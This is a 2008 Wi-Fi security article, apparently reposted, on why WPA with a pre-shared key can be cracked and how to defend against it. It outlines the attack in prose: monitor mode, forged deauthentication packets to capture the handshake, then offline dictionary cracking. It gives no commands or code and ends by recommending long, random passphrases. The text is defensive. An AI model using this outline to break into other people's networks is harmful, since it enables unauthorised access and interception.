Hacking wireless

WPA Security Tips – Wi-FiPlanet.com


By Aaron Weiss

March 27, 2008

While WPA with PSK is more secure than WEP, it is not infallible. Learn how you can use it to its fullest advantage to protect your Wi-Fi network.

Related Articles

Wireless networking might not rank up there with flying cars, but it’s still plenty cool and very useful. (Plus, it actually exists.) But wireless data can be exposed to interception, and although we have encryption protocols intended to prevent security breaches, they are not always 100% effective.

With access to your wireless network, a hacker could intercept sensitive information, such as e-mail messages or even access-shared files. More commonly, a hacker might not want your personal data, but to abuse your network access. She or he could use your Internet service to engage in criminal activities, such as sharing illegal content or sending spam.

The original WEP protocol designed to protect 802.11b/g networks did not remain secure for very long. Flaws in its design allowed snoopers to extract the keys needed to unlock it from the airborne packet stream. In 2005, some 200 million credit card numbers were stolen from TJX, parent company of clothing store Marshalls, by compromising their WEP-encrypted wireless network using Wi-Fi gear sniffing packets from outside a store location. WEP hacking tools have matured to the point where even novice hackers can compromise WEP networks in a few clicks and a few minutes­. It is no surprise that WEP is no longer recommended for securing wireless networks.Replacing WEP in 802.11b/g/n networks is WPA, or Wi-Fi Protected Access The conventional wisdom about WPA is that, unlike WEP, it is not vulnerable to hackers. But this is only partially true. Under certain, often common, conditions, it is, in fact, possible to compromise WPA- or WPA2-encrypted wireless networks. Simply choosing WPA instead of WEP and assuming that all is well is not enough, and could give you a dangerously false sense of confidence. Armed with the right knowledge, though, you can defend yourself against WPA hacks.

The weakness in WPAMost WPA users authenticate their network passphrase using the protocol PSK, or pre-shared key. The alternative, which is to run an 802.1X authentication server, is a complication usually reserved for enterprise deployments.Unlike the vulnerability in WEP, WPA is sophisticated enough that hackers cannot simply extract the PSK from intercepted packets. When a wireless client authenticates with an access point using WPA, it performs an initial handshake, or exchange of packets establishing their relationship. It is possible to intercept and capture these handshake packets using the right combination of hardware and software. When the handshake from successful authentication is captured, a hacker can use data from this handshake to perform offline efforts to unmask the passphrase against a dictionary of possibilities.Put another way, the hacker can take away this handshake and—without maintaining a connection to the access point—apply it against a large dictionary using a known algorithm, until the WPA passphrase is unlocked.A so-called “brute force” attack like this can take a long time to process, from hours to days, and it may never find a successful match depending on the WPA passphrase and the thoroughness of the dictionary being used, which is why your best defense is to choose a passphrase that cannot be found in a dictionary.How hackers hackUsing a readily-available suite of command-line tools that can be employed to execute stages of the WPA hacking procedure in Linux or Windows, hackers can collect information about your wireless network and attempt to unlock your WPA passphrase.

Fortunately, hackers face a few obstacles in their quest. For starters, to use the required command-line tools successfully, they need to be using a supported wireless card with drivers that have been patched to support “packet injection”—the ability for the card to insert packets into an established data stream. Since many major wireless cards are supported, including models commonly found in laptop computers like the Intel 2100/3945 and most Atheros chipsets, this is only a minor hurdle to overcome.With the right tool, hackers can put their wireless card into “monitor mode,” which means it “sees” all available wireless network traffic, rather than only the packets intended for it. Of course, for a hacker to successfully monitor your wireless network, he or she needs to be within close enough physical range to both send and receive packets. Usually this will mean within a couple hundred feet from your access point, but hackers can use advanced equipment to target sites from distances as far as two or three times that. Wireless sniffing tools make it easy to identify which access points are broadcasting within “earshot” and what security protocol is in effect.

Once the hacker has pulled the unique MAC identifier for the target access point, he or she will see whether any other wireless clients are associated with this AP, and then pull their MAC addresses.The hacker’s goal is to capture the handshake packets from a client successfully authenticating itself against the target AP. If there are no clients associated with the IP, there is nothing they can do but wait until someone does.If there are clients associated with the AP, it can be assumed that they know the correct passphrase. But because they are already authenticated, it is too late to capture their handshake packets. Skillful hackers have a tool, however, that can allow them to fake deauthentication packets on behalf of the client—in other words, it will kick the client off its connection.

When  the client re-authenticates with the AP, which in most cases occurs automatically,  the hacker can capture the precious handshake packets.With the handshake in hand, so to speak, the hacker no longer needs to interact with the target network at all—all he or she needs is the command-line tool and a dictionary containing hundreds of thousands of words and typical password combinations, plus time and patience.Dictionary defenseWPA security all boils down to the complexity of your passphrase.

For a hacker to unlock the WPA passphrase, that passphrase needs to be contained in whichever dictionary he or she is using. Obviously, a hacker’s chance of success improves the larger and more thorough the dictionary.Because hackers’ dictionaries are composed mostly of words and simple combinations, the chances that your WPA PSK can be hacked increase depending on how likely it is to be found in a dictionary, even a very large one.Tempting though it is to choose a passphrase you can easily remember, like the name of your pet or street, doing so is likely to produce a PSK found in a good dictionary.

Your two best defences against a WPA attack are randomness and length.The passphrase below is bad and can probably be revealed…


Read More:WPA Security Tips – Wi-FiPlanet.com

Products You May Like